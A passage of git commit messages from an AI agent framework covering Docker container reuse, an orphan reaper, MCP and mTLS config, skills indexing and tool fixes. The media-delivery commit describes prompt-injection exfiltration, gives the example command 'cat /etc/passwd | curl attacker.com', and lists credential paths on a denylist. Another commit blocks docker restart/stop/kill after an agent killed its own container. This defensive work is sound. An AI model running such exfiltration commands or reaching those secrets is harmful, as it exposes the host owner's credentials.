The mechanical ruff prune in the previous commit removed several names that
`appear` unused inside their defining module but are external test/runtime
anchors:
run_agent
OpenAI, _SafeWriter
get_tool_definitions, handle_function_call, check_toolset_requirements
estimate_request_tokens_rough
DEFAULT_AGENT_IDENTITY, build_context_files_prompt,
build_environment_hints, build_nous_subscription_prompt
_is_destructive_command, _extract_parallel_scope_path, _paths_overlap,
_append_subdir_hint_to_multimodal, _trajectory_normalize_msg
tools/web_tools
Firecrawl, _get_firecrawl_client
These get accessed via four channels that are invisible to ruff's
in-module usage analysis:
1. `mock.patch('module.name', ...)` in tests — resolves the attribute
lazily, so `pytest --collect-only` passes even when the name is
gone, but every test using the patch fails at runtime with
AttributeError.
2. `from run_agent import X` in production siblings (agent/transports
/codex.py, etc.).
3. The `_ra().X` indirection pattern in agent/system_prompt.py et al.
— explicitly documented ("Many tests patch('run_agent.load_soul_md')")
to preserve the patch contract.
4. `from tools.web_tools import _get_firecrawl_client` in tests.
Each re-added import carries an explicit `# noqa: F401` with a comment
naming the channel, so future cleanup passes won't strip them again.
Remove unused imports (F401) and duplicate/shadowed import
redefinitions (F811) across the codebase using ruff's safe
autofixes. No behavioral changes -- imports only.
- ~1400 safe autofixes applied across 644 files (net -1072 lines)
- __init__.py re-exports preserved (excluded from F401 removal so
public re-export surfaces stay intact)
- Re-exports that are imported or monkeypatched by tests but look
unused in their defining module are kept with explicit # noqa:
F401 (gateway/run.py load_dotenv; run_agent re-exports from
agent.message_sanitization, agent.context_compressor,
agent.retry_utils, agent.prompt_builder, agent.process_bootstrap,
agent.codex_responses_adapter)
- Unsafe F841 (unused-variable) fixes deliberately skipped -- those
can change behavior when the RHS has side effects
- ruff lints remain disabled in pyproject.toml (only PLW1514 is
selected); this is a one-time cleanup, not a config change
Verification:
- python -m compileall: clean
- pytest --collect-only: all 27161 tests collect (zero import errors)
- core entry points import clean (run_agent, model_tools, cli,
toolsets, hermes_state, batch_runner, gateway)
- static scan: every name any test imports directly from an edited
module still resolves
* fix(codex): surface error code in Responses 'failed' status errors
When a Codex Responses turn ends with status=failed, the response carries
the failure details under `response.error` as
`{code, message, param, ...}`. The previous extractor pulled only
`message`, so users seeing a rate-limit failure got a bare "Slow down"
string indistinguishable from a generic stream truncation; an
internal_error with empty message degraded to a dict dump
("{'code': 'internal_error', 'message': ''}").
Extract a `_format_responses_error()` helper that:
- prefixes `code` when both code and message are present
(e.g. 'rate_limit_exceeded: Slow down')
- falls back to the bare `code` when message is empty
- accepts both dict and attribute-style payloads (SDK and JSON-RPC paths)
- preserves the prior status-only fallback when no error payload exists
Apply the same helper at the sibling site in
`codex_app_server_session.run_turn()` so codex-CLI subprocess turn
failures get the same treatment.
Tests:
- 8 new unit tests for `_format_responses_error` covering both shapes,
empty/missing fields, non-string fields, and the status-only fallback.
- 2 regression tests on `_normalize_codex_response` for failed status
with and without a code, asserting the exact RuntimeError message.
- All 3603 tests in tests/agent/ pass.
Adapted from anomalyco/opencode#28757.
* feat(prompt): universal task-completion guidance + local Python toolchain probe
Two cross-model failure modes get a single-line answer in the cached
system prompt. Both gated by config (default on), both add zero overhead
when not needed, both verified via real AIAgent prompt builds.
## What changed
`TASK_COMPLETION_GUIDANCE` — short prompt block applied to ALL models.
Targets two failure modes observed on a real Sarasota real-estate build
task: (1) Opus stopped after writing an 85-byte stub and gave a prose
response with finish_reason=stop on call #3 of 90; (2) DeepSeek pushed
through a PEP-668 wall, then returned fabricated listings instead of
admitting the blocker. Both behaviors are model-family-agnostic, so the
guidance lives outside the existing tool_use_enforcement gate (~192
tokens, paid once per session via prefix cache).
`tools/env_probe.py` — local Python toolchain probe. Detects
python3/pip/uv/PEP-668 state and emits ONE short line in the system
prompt when something is non-default. Emits NOTHING when the env is
clean (zero token cost for normal users). Skipped entirely for remote
terminal backends (docker/modal/ssh) — they have their own probe.
Example output on a broken environment (the actual case):
Python toolchain: python3=3.11.15 (no pip module),
python=missing (use python3), pip→python3.12 (mismatch),
PEP 668=yes (use venv or uv).
## Config
Both flags live under `agent.` in config.yaml, default True:
agent:
task_completion_guidance: true # universal "finish the job" block
environment_probe: true # local Python toolchain hints
Neither addition required a `_config_version` bump — deep-merge fills
defaults in for existing user configs.
## Validation
| Test surface | Result |
|---|---|
| tests/tools/test_env_probe.py | 10/10 pass (probe unit) |
| tests/run_agent/test_run_agent.py — new classes | 8/8 pass (integration) |
| TestToolUseEnforcementConfig | 17/17 pass (no regression) |
| TestBuildSystemPrompt | 9/9 pass (no regression) |
| TestInvalidateSystemPrompt | 2/2 pass (no regression) |
| tests/agent/test_prompt_builder.py | 124/124 pass (no regression) |
| tests/hermes_cli/ | 5662/5662 pass (config defaults) |
| E2E AIAgent build (broken env) | Both blocks present, 2,178 chars |
| E2E AIAgent build (clean env) | 771-char net overhead, env probe silent |
Salvages #24490 by @liuhao1024 against current main.
The Docker daemon will silently auto-create a directory at the host
path of any `-v <host>:<container>` bind mount when the host path
doesn't exist. In Docker-in-Docker setups (where the outer host's
real credential file isn't visible inside the agent's parent
container), this leaves a directory at the credential mount source —
and the inner `docker run` then refuses to mount a directory over a
file destination with exit 125.
Add defensive shape guards to all three mount loops in
DockerEnvironment.__init__:
* credentials (expected: file) — skip + warn on directory or missing
* skills (expected: dir) — skip + warn when not a directory
* cache (expected: dir) — skip + warn when not a directory
Failed mounts surface as WARN logs rather than crashing the container
start. Existing well-formed sources mount unchanged.
The original PR's branch was on a pre-container-reuse-rework base
(May 12) and conflicted with the post-May-28 driver work (label
tagging, container reuse, orphan reaper). Reconstructed the same
intent on current main; the three guard blocks slot cleanly into
`tools/environments/docker.py` around the existing mount loops.
Three new tests pinned in `tests/tools/test_docker_environment.py`:
directory-source skip, missing-source skip, valid-file mounts. Test-
first regression verification: reverted just the production code to
`origin/main` and confirmed the new tests fail with
`'deleted_token.json' is contained here: /root/.hermes/...` — the
fixed code makes them pass. Full file passes (54/54).
Closes#24490
Co-authored-by: liuhao1024 <11816344+liuhao1024@users.noreply.github.com>
When HOME=/root (Docker containers) and the process runs as unprivileged
user (hermes, uid 10000), Path.home() / '.modal.toml' raises PermissionError
because /root/ is inaccessible. This crashes the dashboard /api/skills endpoint.
Catch PermissionError/OSError and treat as 'no config file'. Env vars still
take priority (tested).
Fixes#33525
NVIDIA's verified skills catalog (https://github.com/NVIDIA/skills) ships
NVIDIA-signed skills for CUDA-X, AIQ, cuOpt, cuPyNumeric, DeepStream, NeMo,
NemoClaw and the Skill Card Generator — each bundle carrying a detached
`skill.oms.sig` signature, a governance `skill-card.md`, and `evals/`. The
sync pipeline drops any skill missing those artifacts before publishing.
Changes:
- tools/skills_hub.py: add NVIDIA/skills to GitHubSource.DEFAULT_TAPS so
it lights up in `hermes skills browse`, `hermes skills search <q>`, the
twice-daily skills-index build, and the docs-site Skills Hub page
(https://hermes-agent.nousresearch.com/docs/skills) automatically.
- tools/skills_guard.py: add NVIDIA/skills to TRUSTED_REPOS so installs
resolve to trust_level="trusted" (looser install policy than community).
- website/scripts/extract-skills.py: map the `github` source id to a
friendly "NVIDIA" pill label for the docs hub page.
- website/src/pages/skills/index.tsx: register the NVIDIA pill (green
#76b900) and slot it into SOURCE_ORDER after HuggingFace.
- website/docs/user-guide/features/skills.md (+ zh-Hans i18n): document
the new default tap and the expanded trusted-repos list.
- tests/tools/test_skills_guard.py: assert NVIDIA/skills resolves to
"trusted" (including the skills-sh-wrapped form).
- tests/tools/test_skills_hub.py: invariant — every TRUSTED_REPOS entry
must be reachable via GitHubSource.DEFAULT_TAPS (prevents future
trusted repos from being declared but never browseable).
Validation:
- Live GitHub fetch: `src.fetch('NVIDIA/skills/skills/aiq-deploy')` pulled
17 files including SKILL.md (13 KB), skill-card.md, skill.oms.sig, and
the full references/ + evals/ tree. trust_level="trusted".
- Live inspect resolved name, description, and trust correctly.
- All 193 existing skills_guard + skills_hub tests still pass.
When docker.sock is mounted (common Docker Compose pattern), the agent
can restart/stop/kill containers without user approval. hermes gateway
restart is already protected, but docker restart, docker stop,
docker kill, and their docker compose equivalents were not.
This caused repeated self-termination: the agent ran docker restart
hermes, killed its own container, Docker restarted it (restart policy),
and the agent resumed the same session — creating a restart loop.
Added patterns mirror the existing gateway lifecycle protection:
- docker compose restart/stop/kill/down
- docker restart/stop/kill
Co-authored-by: Sarbai <sarbai@users.noreply.github.com>
Commit 4 made cleanup_vm() default to force_remove=True, which was wrong:
cleanup_vm() is called from AIAgent.close() (TUI session close at
tui_gateway/server.py:2991, gateway session teardown at gateway/run.py:3569)
and from per-turn cleanup (agent/chat_completion_helpers.py:1517). All
three are session-lifecycle events that should honor persist mode, not
explicit user-initiated teardown.
Ben reported the symptom: container shared between multiple TUI sessions
(good) but killed as soon as any session closed (bad). With force_remove=True
as the default, every `session.close` JSON-RPC tore down the container.
The fix is to flip cleanup_vm()'s force_remove default back to False.
The kwarg still exists for future explicit-teardown paths (`/reset`-style
flows, "destroy my sandbox" commands) that haven't been wired up yet.
Two new unit tests pin the behavior:
* `test_cleanup_vm_default_honors_persist_mode` — asserts
`cleanup_vm(task_id)` does neither docker stop nor docker rm on a
persist-mode container (the regression Ben caught).
* `test_cleanup_vm_force_remove_tears_down_persist_container` —
asserts the kwarg still flows through the runtime-signature-inspection
plumbing to the backend's cleanup().
E2E verified against real Docker (in addition to all 17 existing checks):
✓ Default cleanup_vm() leaves persist-mode container running
✓ cleanup_vm(force_remove=True) removed the container
Refs #20561
The first iteration of this PR did docker stop on every cleanup in
persist mode (only skipping docker rm). Ben caught this as
contradicting the documented "ONE long-lived container shared across
sessions" semantics: stopping the container on every Hermes /quit kills
any background processes inside (npm watchers, pytest watchers,
long-running scripts) — exactly the case persist mode is supposed to
protect.
This commit splits the cleanup paths cleanly:
* **Persist mode (default)** — cleanup() is a NO-OP for the
container. Container stays running, processes survive, next Hermes
process attaches via the existing label probe in ~ms instead of
waiting for docker start. Resource reclamation happens via the
orphan reaper at next startup (2 × lifetime_seconds threshold), which
covers the SIGKILL / OOM / abandoned-laptop cases.
* **Opt-out mode (persist_across_processes=False)** — unchanged:
docker stop + docker rm -f on cleanup as before.
* **Explicit teardown** — new cleanup(force_remove=True) kwarg
overrides persist mode and tears the container down unconditionally.
cleanup_vm(task_id) now defaults to force_remove=True since
it's the user-driven reset path (called from AIAgent.close(),
/reset-style flows, and the idle reaper's per-turn cleanup).
The idle reaper in _cleanup_inactive_envs calls env.cleanup()
directly with no kwargs, so idle persist-mode envs are no-op'd — the
container survives the in-process pop and the next tool call re-probes
via labels. No state leak: _container_id is still cleared on the
in-process handle.
E2E verified against real Docker:
✓ Container is still running after cleanup()
✓ Background process (sleep loop) survived cleanup()
✓ Filesystem state preserved across cleanup()
✓ In-process container_id cleared (next __init__ will re-probe)
✓ Background process visible from reused env (no docker start happened)
✓ force_remove=True removed the container even in persist mode
✓ cleanup_vm() removed the container (defaults to force_remove=True)
Test changes:
* Replaces `test_cleanup_with_persist_only_stops_no_rm` with
`test_cleanup_with_persist_is_noop_for_container` — asserts neither
stop nor rm runs in persist mode, and the in-process handle is
cleared so re-probe works.
* Adds `test_cleanup_force_remove_stops_and_rms_even_in_persist_mode`
— covers the new kwarg.
* Updates `test_cleanup_uses_subprocess_run_not_detached_shell` and
`test_wait_for_cleanup_after_cleanup_returns_true` to pass
`force_remove=True` so they actually exercise the docker code path
(default no-op would trivially pass).
cleanup_vm() forwards `force_remove` only to backends whose cleanup()
accepts the kwarg (currently just DockerEnvironment) via runtime
signature inspection — Modal/Daytona/SSH `cleanup()` signatures are
unchanged.
Refs #20561
The cleanup-fix in the previous commit handles the graceful-exit leak: a
Hermes process that runs ``atexit`` will now actually wait on the docker
stop/rm worker thread, so containers either survive (persist mode) or are
fully removed (opt-out mode) by the time the interpreter exits.
But ``atexit`` doesn't fire on SIGKILL, OOM-kill, or terminal-window
close. Containers from those exits stay parked with no surviving Python
process to reuse or remove them, so they accumulate until the operator
intervenes with ``docker rm -f``. The cleanup-fix doesn't help this class
— there's no live cleanup() to fix.
This commit adds the safety net: a startup orphan reaper that runs once
per Hermes process and removes long-Exited hermes-labeled containers
that the prior commit couldn't reach.
Implementation:
* New ``reap_orphan_containers()`` in ``tools/environments/docker.py``.
Filters: ``label=hermes-agent=1`` + ``status=exited`` + (optional)
``label=hermes-profile=<current>``. Per-container ``docker inspect``
parses ``State.FinishedAt`` (with nanosecond-precision trimming for
Python's microsecond-bound ``fromisoformat``); containers older than
the threshold get ``docker rm -f``'d. The ``status=exited`` filter is
load-bearing — a running container may belong to a sibling Hermes
process whose reuse path will pick it up; killing it would crash the
sibling mid-command. Single-container failures are logged and the
sweep continues to the next candidate.
* New ``_maybe_reap_docker_orphans()`` helper in
``tools/terminal_tool.py``. Wired into ``_create_environment()`` for
``env_type == "docker"``. Gated by:
- ``terminal.docker_orphan_reaper: true`` (default; opt-out for
operators running multiple Hermes processes in the same profile
who don't trust the conservative defaults)
- ``_docker_orphan_reaper_ran`` module flag with double-checked
locking — parallel subagents and RL rollouts don't trigger N
concurrent docker ps storms
- Age threshold = ``2 × TERMINAL_LIFETIME_SECONDS`` with a 60s floor
(so ``TERMINAL_LIFETIME_SECONDS=0`` doesn't race the user's own
setup)
- Profile scoping — a research profile NEVER reaps the default
profile's stragglers
- Exception swallow — a janitor failure must never block container
creation
* New config ``terminal.docker_orphan_reaper`` wired through all four
config-bridge sites (cli.py, gateway/run.py, hermes_cli/config.py,
tests/conftest.py) and pinned by
``test_docker_orphan_reaper_is_bridged_everywhere``.
Coverage:
* 9 new unit tests in test_docker_environment.py — happy path, recent-
container sparing, profile scoping, unparseable-timestamp safety,
docker-ps-failure handling, partial-failure continuation, nanosecond
timestamp parsing, zero-value FinishedAt rejection.
* 6 new integration tests in test_docker_orphan_reaper_integration.py
— once-per-process gate, disable-flag respected, lifetime doubling
with 60s floor, current-profile filter wiring, exception swallow.
* 1 new bridge-invariant regression test.
Closes#20561 (combined with the two prior commits on this branch).
The Docker backend docs claim "Single persistent container — ONE long-
lived container shared across sessions, /new, /reset, and delegate_task
subagents. Stopped/removed on shutdown." In practice the code only
honored that contract within a single Python process via the in-memory
\`_active_environments[task_id]\` cache. Every \`hermes chat\` invocation
spawned a fresh \`hermes-<hex>\` container; older containers piled up in
\`Exited\` state and accumulated until manual \`docker rm\` (issue #20561).
Three root causes, all addressed by this commit:
1. No cross-process container discovery.
2. \`cleanup()\` used fire-and-forget \`subprocess.Popen("... &", shell=True)\`
which raced with parent-process exit — when Python exited promptly the
detached shell child got killed mid-\`docker stop\`, leaving stopped
containers behind.
3. The \`docker rm\` step in cleanup was gated on \`not self._persistent\`
(the bind-mount-persistence flag). Default config sets
\`container_persistent: true\`, so the default happy path skipped \`rm\`
entirely — even when the user explicitly didn't want cross-process
reuse, containers leaked.
Fix:
* Add \`DockerEnvironment.__init__(persist_across_processes=True)\`. When
true, init probes
\`docker ps -a --filter label=hermes-agent=1
--filter label=hermes-task-id=<task>
--filter label=hermes-profile=<profile>\`
and reuses a matching container (running → attach; stopped →
\`docker start\` → attach; \`docker start\` failure → fall through to a
fresh \`docker run\`). Multiple matches prefer the running one, with the
stragglers left for the orphan reaper (next commit) to clean up.
* Rewrite \`cleanup()\`. Uses \`subprocess.run(..., timeout=30)\` on a
daemon \`threading.Thread\`, not the racy \`Popen(... &)\`. The
\`_persistent\` guard is dropped on the \`rm\` step — \`rm\` now runs
whenever \`persist_across_processes\` is false, regardless of the
bind-mount-persistence setting. The leak class is gone in all
combinations.
* Add \`wait_for_cleanup(timeout)\`. \`tools/terminal_tool.py\`'s atexit
hook calls this on every active env, blocking up to 15s for the
cleanup thread before interpreter exit. Without this, \`hermes /quit\`
raced the daemon-thread teardown and dropped the stop/rm work.
* New config \`terminal.docker_persist_across_processes\` (default
\`true\` — restores the documented contract). Set \`false\` for hard
per-process isolation. Wired through all four config-bridge sites
(cli.py env_mappings, gateway/run.py _terminal_env_map,
hermes_cli/config.py _config_to_env_sync, tests/conftest.py env-strip
list); regression-pinned by
\`test_docker_persist_across_processes_is_bridged_everywhere\` matching
the existing pattern for docker_run_as_host_user / docker_env.
Reuse intentionally does NOT compare image / mounts / resources — only
the labels. Operators changing those settings should set
\`docker_persist_across_processes: false\` (or \`docker rm -f\` the
labeled container) to force a fresh start. This keeps the probe cheap
and the failure mode obvious.
Coverage: 12 new unit tests in tests/tools/test_docker_environment.py
covering reuse paths (running, stopped, fallback, opt-out, duplicate
preference) and cleanup behavior (persist-mode no-rm, opt-out always-rm,
no-Popen, wait_for_cleanup semantics, partial-init safety). Plus one
config-bridge regression pin.
Refs #20561
Issue #20561 (Docker containers accumulate) needs a way to identify
hermes-created containers from the outside — both for the orphan reaper
(a follow-up commit) and for operators triaging `docker ps -a | grep
hermes-` after a SIGKILL leaves stragglers. The previous `hermes-<hex>`
name prefix was the only signal, which broke down under cross-process
reuse (planned) and against any custom `--name` someone might pass via
`docker_extra_args`.
This commit adds three labels at `docker run` time:
--label hermes-agent=1 # global sweep target
--label hermes-task-id=<sanitized> # per-task reuse key
--label hermes-profile=<sanitized> # per-profile isolation key
Values are sanitized to `[A-Za-z0-9_.-]` and truncated to 63 chars so the
label round-trips cleanly through `docker ps --filter label=key=value`.
Empty or non-string inputs collapse to "unknown" rather than producing
an unqueryable empty value.
No behavior change: the labels are pure metadata. The follow-up commits
in this PR (cleanup-fix + orphan reaper) are what use them.
Refs #20561
When the Hermes Docker image runs an stdio MCP server configured with an
explicit env.PATH that omits /usr/local/bin (a common pattern when users
hand-author PATH for sandboxing), the MCP env-filter passes that narrow
PATH straight through to the subprocess. _resolve_stdio_command's
fallback for bare 'npx' / 'npm' / 'node' commands only checked
$HERMES_HOME/node/bin/ and ~/.local/bin/, so execvp() failed with
'[Errno 2] No such file or directory: npx' on every Node-based stdio
MCP server (Railway, Anthropic, GitHub Copilot, etc.).
The naive workaround — symlink /usr/local/bin/npx into the user's PATH —
fails one layer deeper because npx's shebang re-execs /usr/bin/env node
and node also lives at /usr/local/bin/node.
Fix: add /usr/local/bin/<cmd> as a third candidate in the fallback list.
This is the canonical install location for Node on:
- Linux from-source builds
- the upstream node:bookworm-slim image, which the Hermes Docker
image copies node + npm + corepack from since #4977 (the Node 22 LTS
refactor that exposed this)
- macOS Homebrew on Intel
Because the resolver already calls _prepend_path(resolved_env, command_dir)
after locating the command, /usr/local/bin gets prepended to the env's
PATH automatically, which also fixes the second-layer shebang failure
(npx-cli.js can now find node).
Scope is intentionally narrow: the fix activates only when the bare
command isn't otherwise locatable through the user's PATH. Users who
explicitly narrowed PATH for a non-Node MCP server see no change in
behavior.
Tested:
- tests/tools/test_mcp_tool_issue_948.py: new test
test_resolve_stdio_command_falls_back_to_usr_local_bin (mirrors the
existing hermes-node-bin fallback test)
- Full MCP test suite: 254/254 pass across 7 test files
- E2E against a freshly-built Docker image: reproduced the original
failure mode (env.PATH=/opt/data/bin:/usr/bin:/bin), confirmed the
resolver returns /usr/local/bin/npx and prepends /usr/local/bin to
PATH; subprocess.run of the resolved command prints '10.9.8' and
exits 0 with empty stderr
- Negative E2E on the host (where Node is already on PATH via mise):
resolver still hits the mise install dir, /usr/local/bin candidate
is not consulted, PATH is unchanged
PR #29523 restricted MEDIA: paths and bare local paths in agent output to
files under the Hermes media cache or an operator-allowlisted root, with
a 10-minute recency window as a fallback. The intent was to defend
against prompt-injection-driven exfiltration of host secrets, but in the
default single-user setup the asymmetry doesn't earn its keep: we accept
any document type the user uploads inbound (.md, .pdf, .txt, .docx, ...)
and the agent already has terminal access — anything that can convince
it to emit a MEDIA: tag for /etc/passwd can equally convince it to
`cat /etc/passwd | curl attacker.com`.
Practical breakage: agents that produced an .md, .pdf, or other
artifact more than ~10 minutes ago, or outside the cache allowlist,
showed the user a raw filepath in chat instead of the file.
Default flipped to denylist-only:
• /etc, /proc, /sys, /dev, /root, /boot, /var/{log,lib,run}
• $HOME/{.ssh,.aws,.gnupg,.kube,.docker,.config,.azure,.gcloud}
• macOS Library/Keychains
• $HERMES_HOME/{.env, auth.json, credentials}
The legacy allowlist+recency-window behavior stays available via
opt-in: `gateway.strict: true` in config.yaml (or
`HERMES_MEDIA_DELIVERY_STRICT=1`). Recommended for public-facing bots
where prompt injection from one user shouldn't be able to exfiltrate
the host's secrets to that same user.
• `gateway/platforms/base.py` — `validate_media_delivery_path()`
short-circuits to "return resolved if not under denylist" when
strict is off. Strict mode preserves the original cache-then-
allowlist-then-recency logic. New `_media_delivery_strict_mode()`
reader for `HERMES_MEDIA_DELIVERY_STRICT`.
• `hermes_cli/config.py` — `gateway.strict: false` added to
DEFAULT_CONFIG; existing keys documented as "only consulted in
strict mode." No `_config_version` bump needed (deep-merge picks
up the new default for old installs).
• `gateway/run.py` — bridges `gateway.strict` →
`HERMES_MEDIA_DELIVERY_STRICT` at startup.
• `tools/send_message_tool.py` — schema description broadened back
to plain "any local path."
• Tests — existing strict-path tests pinned to STRICT=1 so they keep
exercising the legacy behavior; new `TestMediaDeliveryDefaultMode`
with 8 cases covering the public default (stale .md accepted, any
extension delivers, credential paths still blocked, strict env-var
aliases, filter E2E).
Validation:
- tests/gateway/test_platform_base.py: 119/119 pass
- tests/gateway/test_tts_media_routing.py: 7/7 pass
- tests/tools/test_send_message_tool.py: 121/121 pass
- tests/hermes_cli/test_kanban_notify.py: 12/12 pass
- tests/cron/test_scheduler.py: 120/120 pass
- E2E via execute_code with real imports:
• stale .md outside allowlist → accepted (default)
• same path with STRICT=1 → rejected
• $HOME/.ssh/id_rsa → rejected (default)
• filter_local_delivery_paths([md, key]) → [md] only
• gateway.strict in config.yaml → bridged to env (true=1, false=0)
The skills.sh source was returning ~858 unique skills from a hardcoded
list of 28 popular keyword searches (each capped at 50 results). The
real catalog is ~20k — exposed via sitemap-skills-{1,2}.xml linked from
the site's sitemap index.
Switch the empty-query path in SkillsShSource.search() to walk the
sitemap instead of scraping the homepage's curated featured strip.
Falls back to the homepage scrape if the sitemap is unreachable.
build_skills_index.crawl_skills_sh() now just calls search("", limit=0)
instead of running 28 keyword searches — same result in one HTTP round
instead of 28.
Also handle a httpx + brotlicffi interaction: the per-skill sitemaps
are ~900 KB brotli-compressed and the cffi backend's streaming decode
chokes on them. Forcing Accept-Encoding to gzip dodges the bug without
requiring a brotli library upgrade.
E2E against live skills.sh: 19,932 unique skills walked in 0.7s.
Tests: 137 pass (+1 new regression test exercising the sitemap path).
Floor for skills.sh raised 100 → 10,000 in EXPECTED_FLOORS so a future
regression hard-fails the build.
The web_crawl_tool() function was an orphan — no model schema registered
it, no skill or CLI command called it, and the agent had no way to invoke
it. PR #32608 proposed wiring it up as a model-callable tool; we've
decided not to expose crawl as a separate capability since web_search +
web_extract cover the use cases we want models to have.
Removed:
- tools/web_tools.py: web_crawl_tool() (~230 LOC)
- plugins/web/firecrawl/provider.py: supports_crawl() + crawl()
- plugins/web/tavily/provider.py: supports_crawl() + crawl()
- plugins/web/xai/provider.py: supports_crawl() override
- agent/web_search_provider.py: supports_crawl() + crawl() ABC methods
- agent/web_search_registry.py: get_active_crawl_provider() +
the 'crawl' branch in _resolve()
- agent/display.py: web_crawl tool-progress rendering
- hermes_cli/config.py: 'web_crawl' from TAVILY_API_KEY.tools
- tools/website_policy.py: stale comment reference
- Tests: removed TestWebCrawlTavily class, the two website-policy
web_crawl tests, the searxng/ddgs/brave-free crawl-error tests,
the integration test_web_crawl method, and the
test_unconfigured_crawl_emits_top_level_error test. Trimmed the
capability-flag parametrize list and the WebSearchProvider ABC
conformance tests.
- Docs: trimmed the Crawl column from capability tables in both EN
and zh-Hans, updated the developer-guide ABC table.
Net: 25 files, +115/-1067.
Closes#33762 (the schema-text bug only existed if #32608 landed).
Supersedes #32608.
Extends @liuhao1024's escape-normalized fix so the patch tool also
recovers when old_string carries a real tab byte and matches via the
`exact` strategy — which is the headline reproduction in the issue and
the most common case in practice (LLMs frequently get old_string right
because they re-read the file, but still serialize new_string's tabs as
two-character `\t`).
Instead of gating on the match strategy, decide per-sequence by looking
at the *matched region of the file*: only convert `\t` -> tab and
`\r` -> CR when the file region we're replacing actually contains the
corresponding control byte. That mirrors the region-based heuristic in
`_detect_escape_drift` and keeps legitimate writes of the literal
two-character string `"\t"` (e.g. patching `sep = "\t"` in Python
source) untouched — those files have a backslash+t in the matched
region, not a real tab, so new_string passes through verbatim. `\n` is
still excluded because newlines serialize correctly through JSON and
unescaping would corrupt source escape sequences far more often than
help.
E2E verified against the live `patch` tool: tab-indented file + literal
`\t` in new_string under both `exact` (Variant 1) and `escape_normalized`
(Variant 2) strategies now produces real tab bytes; a Python source line
containing `sep = "\t"` (legitimate literal backslash-t) survives a
patch unchanged.
Tests updated to cover both strategies and the legitimate-literal case,
and to assert that `\n` is intentionally preserved.
Refs #33733
When the patch tool matches via the escape_normalized strategy, old_string
contains literal \t, \n, \r sequences that get unescaped to match real
control characters in the file. However, new_string was written as-is,
leaving literal backslash sequences in the output.
Add _unescape_common_sequences() helper and apply it to new_string when
the matching strategy is escape_normalized. This ensures LLM-generated
tab/newline sequences become real bytes in the patched file.
Fixes#33733
* fix(skills): pull full ClawHub catalog into the skills index
The website was showing 200 ClawHub skills out of 20k+ because
`ClawHubSource.search("")` for empty queries went straight to a single
unpaginated request. ClawHub's API caps any single page at 200 items and
returns a `nextCursor`; we grabbed page 1 and stopped, so the cached
index served from hermes-agent.nousresearch.com had a silent 99%
truncation.
End users never hit clawhub.ai directly (the index is rebuilt twice
daily by .github/workflows/skills-index.yml and served as a static JSON
on the docs site), so the cap-and-cache architecture is correct — it
just wasn't being filled.
Changes:
- `ClawHubSource.search(query="")` now routes through the existing
`_load_catalog_index()` paginating walker instead of the unpaginated
listing fallback (non-empty queries still hit the fast catalog search).
- `_load_catalog_index()` max_pages 50 → 250 (50k-skill ceiling; live
catalog is ~20k as of May 2026, with headroom for growth).
- `build_skills_index.py`: per-source crawl limits split out — ClawHub
and LobeHub get 100k, others keep their effective caps.
- `EXPECTED_FLOORS["clawhub"]` 50 → 5000 so the next pagination
regression hard-fails the CI build instead of silently shipping a
degenerate index.
Test plan:
- New unit test `test_search_empty_query_paginates_full_catalog`
exercises the cursor-following path with three mocked pages (450
total items) and asserts all pages are walked.
- Existing 9 ClawHub tests + 127 broader skills_hub tests all pass.
- E2E against live ClawHub API: walker reached 9700+ skills across 49
pages before this commit landed, paginating well past the previous
50-page cap.
* fix(skills): raise ClawHub ceilings — live catalog is 50k, not 20k
E2E walk against live ClawHub API hit my initial 250-page cap at 49,698
skills with cursor=yes still pending. The catalog is roughly 2.5x larger
than the docstring estimate.
- max_pages 250 → 750 (150k ceiling, walks terminate on cursor=None
well before this in practice)
- SOURCE_LIMITS['clawhub'] 100k → 200k
- EXPECTED_FLOORS['clawhub'] 5000 → 20000
Adds first-class `client_cert` / `client_key` config keys so MCP servers
behind mTLS work without an external TLS-terminating proxy. Resolves
inbound community question (Jeremy W.).
Schema (per `mcp_servers.<name>`, HTTP/SSE only):
- `client_cert: "/path/to/combined.pem"` — single PEM with cert + key
- `client_cert: "/path/to/cert"` + `client_key: "/path/to/key"` — separate
- `client_cert: [cert, key]` or `[cert, key, password]` — list form,
with optional passphrase for encrypted keys
Paths support `~` expansion. Missing files raise a server-scoped
`FileNotFoundError` at connect time rather than failing later with an
opaque TLS handshake error.
Wiring:
- New SDK HTTP path (mcp >= 1.24): `cert=` on the user-owned
`httpx.AsyncClient` alongside the existing `verify=` handling.
- SSE path: routed through an `httpx_client_factory` that wraps the
SDK's defaults (follow_redirects=True) and layers `verify` + `cert`
on top. The factory is only injected when needed, so the SDK's
built-in `create_mcp_http_client` keeps being used in the default
case.
- Deprecated mcp<1.24 path left untouched — that SDK's
`streamablehttp_client` signature doesn't expose `cert`, and adding
it would be dead code.
Also documents the previously-undocumented `ssl_verify` key (bool or
CA bundle path) in the MCP config reference.
Tests:
- `tests/tools/test_mcp_client_cert.py` (new, 19 tests):
- `_resolve_client_cert` helper: all three input forms, `~` expansion,
missing-file and validation errors.
- HTTP transport: `cert=` forwarded into `httpx.AsyncClient` for
string and tuple forms; absent when unset; missing-file error
propagates.
- SSE transport: factory only injected when cert or non-default
verify is set; factory applies cert, custom CA bundle, and
preserves `follow_redirects=True` + forwarded headers/auth.
- Existing tests: 200/200 in `test_mcp_tool.py` + `test_mcp_sse_transport.py`
still pass.
* docs(voice): use `uv pip install faster-whisper` in STT install hints
Three runtime messages told users to `pip install faster-whisper`
(reported in #29782 for the gateway STT failure message under
Telegram-in-Docker, where the user hit `bash: pip: command not
found`). The Hermes Docker image is built on `ghcr.io/astral-sh/uv`
with a uv-managed venv that doesn't ship `pip` on PATH; users on
modern `uv tool install` / `uv venv` installs see the same problem.
The canonical install command in this repo is `uv pip install`
(see `tools/lazy_deps.py:509` `feature_install_command()`), which
works in Docker (uv image), in `uv tool install` venvs, and in
pip-based venvs that already have uv on PATH.
Changed three locations to match:
- `gateway/run.py` — Telegram/Discord/Slack/WhatsApp/etc. voice
reply when no STT provider is configured. Suggests
`uv pip install faster-whisper` and notes that
`pip install faster-whisper` also works if `pip` is on PATH.
- `tools/voice_mode.py` — `/voice` status line for missing STT.
- `cli.py` — Voice-mode startup error, "Option 1".
No behavior change beyond the user-facing text. No production
code path was touched.
* docs(voice): add pip fallback to cli + voice_mode STT hints
Copilot flagged that cli.py and tools/voice_mode.py recommend
`uv pip install faster-whisper` without a fallback for environments
where uv isn't on PATH. The gateway/run.py message already lists
`pip install faster-whisper` as an alternative; this commit aligns
the two remaining call sites to match.
Addresses inline Copilot review on #29800.
---------
Co-authored-by: briandevans <252620095+briandevans@users.noreply.github.com>
fal announced Krea 2 day-0 as an official API partner on 2026-05-27.
Add both variants to the FAL_MODELS catalog so they appear in the
